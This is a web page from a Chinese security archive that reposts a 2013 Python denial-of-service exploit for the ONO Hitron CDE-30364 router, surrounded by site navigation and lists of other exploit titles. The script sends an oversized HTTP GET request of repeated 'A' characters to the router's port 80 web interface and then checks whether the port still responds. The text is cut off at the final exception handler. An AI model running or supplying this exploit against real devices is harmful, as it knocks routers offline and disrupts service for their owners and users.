首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ONO Hitron CDE-30364 Router - Denial Of Service
来源:matias.ms[at]owasp.org 作者:Svensson 发布时间:2013-10-11  
#!/usr/bin/python
  
#-----------------------------------------------------------------------------------------
#Description:
#-----------------------------------------------------------------------------------------
#Hitron Technologies CDE-30364 is a famous ONO Router.
   
#The Hitron Technologies CDE-30364's web interface (listening on tcp/ip port 80), have a problem to insufficient bounds checking of data supplied in HTTP GET requests. The default ip adress of this adsl router, used for management purpose, is 192.168.1.1.
   
import httplib
import socket
import time
import sys
   
print "\n###########################################################################################################"
print "# Exploit Title: Router ONO Hitron CDE-30364 - Denial Of Service(80 port)                                 #"
print "# Date: 8-10-2013                                                                                         #"
print "# Exploit Author: Matias Mingorance Svensson - matias.ms[at]owasp.org                                     #"
print "# Vendor Homepage: http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/ #"
print "# Tested on: Hitron Technologies CDE-30364                                                                #"
print "# Version HW: 1A                                                                                          #"
print "# Version SW: 3.1.0.8-ONO                                                                                 #"
print "###########################################################################################################\n"
   
#Send Request
print "Sending the request to router ONO Hitron CDE-30364...\n"
connct = httplib.HTTPConnection(sys.argv[1],80)
connct.request("GET", "AAAAAAAAAA"*10001)
connct.close()
  
#Check 80 port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(5)
try:
 s.connect((sys.argv[1], 80))
 s.shutdown(2)
 print "Attack Fail!\n"
except:

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ALLPlayer 5.6.2 (.m3u) - Local
·Indusoft Thin Client 7.1 Activ
·Internet Haut Debit Mobile Buf
·VMware Hyperic HQ Groovy Scrip
·davfs2 1.4.6/1.4.7 - Local Pri
·Beetel Connection Manager SEH
·Abuse HTTP Server 2.8 Denial O
·Android Zygote Socket Vulnerab
·PinApp Mail-SeCure Access Cont
·MS13-080 Microsoft Internet Ex
·Firefox For Android Same-Origi
·HP Data Protector Cell Request
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved